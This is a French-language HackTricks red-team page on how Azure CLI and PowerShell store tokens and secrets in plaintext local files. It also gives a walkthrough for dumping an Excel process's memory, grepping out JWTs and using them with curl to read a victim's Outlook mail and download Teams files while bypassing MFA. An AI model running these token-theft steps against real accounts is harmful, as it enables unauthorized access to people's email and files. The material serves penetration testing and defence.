Az - Local Cloud Credentials

Reading time: 4 minutes

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

Stockage local des jetons et considérations de sécurité

Azure CLI (Interface de ligne de commande)

Les jetons et les données sensibles sont stockés localement par Azure CLI, soulevant des préoccupations de sécurité :

  1. Jetons d'accÚs : Stockés en texte clair dans accessTokens.json situé à C:\Users\<username>\.Azure.
  2. Informations sur l'abonnement : azureProfile.json, dans le mĂȘme rĂ©pertoire, contient les dĂ©tails de l'abonnement.
  3. Fichiers journaux : Le dossier ErrorRecords dans .azure peut contenir des journaux avec des identifiants exposés, tels que :
  • Commandes exĂ©cutĂ©es avec des identifiants intĂ©grĂ©s.
  • URL accessibles Ă  l'aide de jetons, rĂ©vĂ©lant potentiellement des informations sensibles.

Azure PowerShell

Azure PowerShell stocke Ă©galement des jetons et des donnĂ©es sensibles, qui peuvent ĂȘtre accessibles localement :

  1. Jetons d'accÚs : TokenCache.dat, situé à C:\Users\<username>\.Azure, stocke les jetons d'accÚs en texte clair.
  2. Secrets de principal de service : Ceux-ci sont stockés non chiffrés dans AzureRmContext.json.
  3. FonctionnalitĂ© de sauvegarde de jetons : Les utilisateurs ont la possibilitĂ© de persister les jetons en utilisant la commande Save-AzContext, qui doit ĂȘtre utilisĂ©e avec prudence pour Ă©viter tout accĂšs non autorisĂ©.

Outils automatiques pour les trouver

Jetons en mémoire

Comme expliqué dans cette vidéo, certains logiciels Microsoft synchronisés avec le cloud (Excel, Teams...) pourraient stocker des jetons d'accÚs en texte clair en mémoire. Donc, simplement dumping la mémoire du processus et greppant pour des jetons JWT pourrait vous donner accÚs à plusieurs ressources de la victime dans le cloud en contournant MFA.

Étapes :

  1. Dump les processus Excel synchronisés avec l'utilisateur EntraID avec votre outil préféré.
  2. Exécutez : string excel.dmp | grep 'eyJ0' et trouvez plusieurs jetons dans la sortie.
  3. Trouvez les jetons qui vous intéressent le plus et exécutez des outils sur eux :
bash
# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq

# Check the email (you need a token authorized in login.microsoftonline.com)
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq

# Download a file from Teams
## You need a token that can access graph.microsoft.com
## Then, find the <site_id> inside the memory and call
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq

## Then, list one drive
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq

## Finally, download a file from that drive:
curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'

Notez que ce type de jetons d'accĂšs peut Ă©galement ĂȘtre trouvĂ© Ă  l'intĂ©rieur d'autres processus.

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks